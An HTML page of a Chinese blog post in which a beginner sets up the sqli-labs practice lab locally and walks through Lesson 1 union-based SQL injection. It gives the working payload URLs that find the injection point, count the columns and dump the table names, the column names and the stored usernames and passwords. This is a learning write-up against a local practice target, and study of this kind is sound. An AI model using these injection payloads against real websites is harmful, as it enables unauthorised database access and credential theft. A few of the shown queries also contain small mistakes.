<!DOCTYPE html>
<html>
  <!-- Html Head Tag-->
  <head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="">
  <meta name="author" content="moMaxX">
  <!-- Open Graph Data -->
  <meta property="og:title" content="sqli-labs学习sql注入"/>
  <meta property="og:description" content="" />
  <meta property="og:site_name" content="Momax&#39;s blog"/>
  <meta property="og:type" content="article" />
  <meta property="og:image" content="http://moMaxX.github.io"/>
  
    <link rel="alternate" href="/atom.xml" title="Momax&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  

  <!-- Site Title -->
  <title>Momax's blog</title>

  <!-- Bootstrap CSS -->
  
<link rel="stylesheet" href="/css/bootstrap.min.css">

  <!-- Custom CSS -->
  
  
<link rel="stylesheet" href="/css/style.light.css">


  <!-- Google Analytics -->
  

<meta name="generator" content="Hexo 4.2.0"></head>

  <body>
  	<!-- 雪花特效 --> 
  
    <!-- Page Header -->


<header class="site-header header-background" style="background-image: url(/img/default-banner-light.jpg)">
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="page-title with-background-image">
          <p class="title">sqli-labs学习sql注入</p>
          <p class="subtitle"></p>
        </div>
        <div class="site-menu with-background-image">
          <ul>
            
              <li>
                <a href="/">
                  
                  Home
                  
                </a>
              </li>
            
              <li>
                <a href="/archives">
                  
                  Archives
                  
                </a>
              </li>
            
              <li>
                <a href="https://github.com/MomaxX" target="_blank" rel="noopener">
                  
                  Github
                  
                </a>
              </li>
            
              <li>
                <a href="mailto:194038819@qq.com">
                  
                  Email
                  
                </a>
              </li>
            
          </ul>
        </div>
      </div>
    </div>
  </div>
</header>

<article>
  <div class="container typo">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="post-info text-muted">
          
            <!-- Author -->
            <span class="author info">By moMaxX</span>
          
          <!-- Date -->
          <span class="date-time info">On
            <span class="date">2020-02-29</span>
            <span class="time">00:45:47</span>
          </span>
          
        </div>
        <!-- Tags -->
        
        <!-- Post Main Content -->
        <div class="post-content">
          <h2 id="sqli-labs的安装和配置"><a href="#sqli-labs的安装和配置" class="headerlink" title="sqli-labs的安装和配置"></a>sqli-labs的安装和配置</h2><h2 id="在大佬的指导下进行了对sql注入的初步了解，特写博客来记录一下第一次时遇到的问题。"><a href="#在大佬的指导下进行了对sql注入的初步了解，特写博客来记录一下第一次时遇到的问题。" class="headerlink" title="在大佬的指导下进行了对sql注入的初步了解，特写博客来记录一下第一次时遇到的问题。"></a>在大佬的指导下进行了对sql注入的初步了解，特写博客来记录一下第一次时遇到的问题。</h2><p>下载sqli-labs和phpstudy(注意PHP study版本不能高于8.0，不然容易出错，本人就是PHP study版本高了，一直出错)<br>下载完成后将sqli-labs解压放在PHP study的WWW文件夹下<br><img src="https://img-blog.csdnimg.cn/20200225152738529.png" alt="在这里插入图片描述"><br>打开sqli-labs-master\sql-connections，在里面有一个db-creds.inc文档，打开编辑<br><img src="https://img-blog.csdnimg.cn/20200225153013271.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9iG9nLmNzZG4ubmV0L3FxXzQ2MDQxNzIz,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>一般默认用户名、密码都是root，更改过的话输入自己更改后的就行。接下来浏览器输入<a href="http://localhost/sqli-labs-master打开" target="_blank" rel="noopener">http://localhost/sqli-labs-master打开</a><br><img src="https://img-blog.csdnimg.cn/20200225153308153.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MDQxNzIz,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>点击Setup/reset Database for labs<br><img src="https://img-blog.csdnimg.cn/20200225153517725.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MDQxNzIz,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>出现这个就代表成功了。</p>
<h2 id="联合查询注入法"><a href="#联合查询注入法" class="headerlink" title="联合查询注入法"></a>联合查询注入法</h2><p><strong>在sql注入时应该记住的一些东西<br>information_schema库存放了所有库的信息<br>information_schema.columns包含了所有表的字段<br>table_name表名<br>table_schema数据库名<br>column_name列名<br>information_schema.tables包含所有库的表名<br>group_concat()函数能将相同的行组合起来，省老事了。</strong></p>
<p><strong>联合查询注入的原理</strong><br>联合查询注入的前提就是要有显示位(通过查询从数据库返回到页面的内容)。<br>因本人为萌新一枚，在这里就以sqli-labs（一）为例子进行说明。<br>打开网站，进入Lesson 1<br><img src="https://img-blog.csdnimg.cn/20200228192549167.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MDQxNzIz,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><strong>1、判断注入点</strong><br>闭合符号一般是’、”或者没有闭合符号，而注释符号一般是”) 和 –+<br>在搜索框内输入?id=1’，发现提示错误。<br><img src="https://img-blog.csdnimg.cn/20200228193234290.png" alt="在这里插入图片描述"><br>用注释符号–+注释后发现正常</p>
<p><img src="https://img-blog.csdnimg.cn/20200228193407902.png" alt="在这里插入图片描述"><br>说明注入点是单引号’<br><strong>2、判断列数</strong><br>在输入框内输入id=1,,2,3;时，均有不同的数据返回。然后输入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+</span></span><br></pre></td></tr></table></figure>
<p>发现<br><img src="https://img-blog.csdnimg.cn/20200228193828695.png" alt="在这里插入图片描述"><br>说明一共有三列<br><strong>3、联合查询开始</strong><br>输入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/sqli-labs-master/Less-1/?id=0' union select 1,2,3 --+</span></span><br></pre></td></tr></table></figure>
<p>在这里的意思是将id的值等于一个在数据库中不存在的数，通过联合查询可以看出输入的数据会在哪里显示出来。<br><img src="https://img-blog.csdnimg.cn/20200228194255782.png" alt="在这里插入图片描述"><br>结果显示出了2 3的位置，所以在2 3位置我们便可以输入我们想用的句子。<br><strong>爆数据库</strong><br>爆数据库时可以通过一个<strong>database()</strong>语句来查看当前的数据库</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost/sqli-labs-master/Less-1/?id=0' union select 1,database(),3 --+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200228194743939.png" alt="在这里插入图片描述"><br><strong>爆数据表</strong><br>在上面说的一些语句，这里就要用到了<br>既然是爆数据表，首先就需要一个group_concat()函数加一个数据表名table_name,然后还需要指定一个来源，而来源就是所有库的表名从上面爆出来的数据库中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200229193148686.png" alt="在这里插入图片描述"><br><strong>爆字段</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,(select group_concat(column_name) from information_schema.column where table_schema='users'),3 --+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200229194221881.png" alt="在这里插入图片描述"><br><strong>爆值</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/sqli-labs-master/Less-1/?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+</span></span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200229194455846.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2MDQxNzIz,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>这样，值就被爆出来了！</p>
<hr>

        </div>
      </div>
    </div>
  </div>
</article>



    <!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <p class="copyright text-muted">
          Theme By <a target="_blank" href="https://github.com/levblanc">Levblanc.</a>
          Inspired By <a target="_blank" href="https://github.com/klugjo/hexo-theme-clean-blog">Clean Blog.</a>
        <p class="copyright text-muted">
          Powered By <a target="_blank" href="https://hexo.io/">Hexo.</a>
        </p>
      </div>
    </div>
  </div>
</footer>


    <!-- After Footer Scripts -->

<script src="/js/highlight.pack.js"></script>

<script>
  document.addEventListener("DOMContentLoaded", function(event) {
    var codeBlocks = Array.prototype.slice.call(document.getElementsByTagName('pre'))
    codeBlocks.forEach(function(block, index) {
      hljs.highlightBlock(block);
    });
  });
</script>

  </body>
</html>

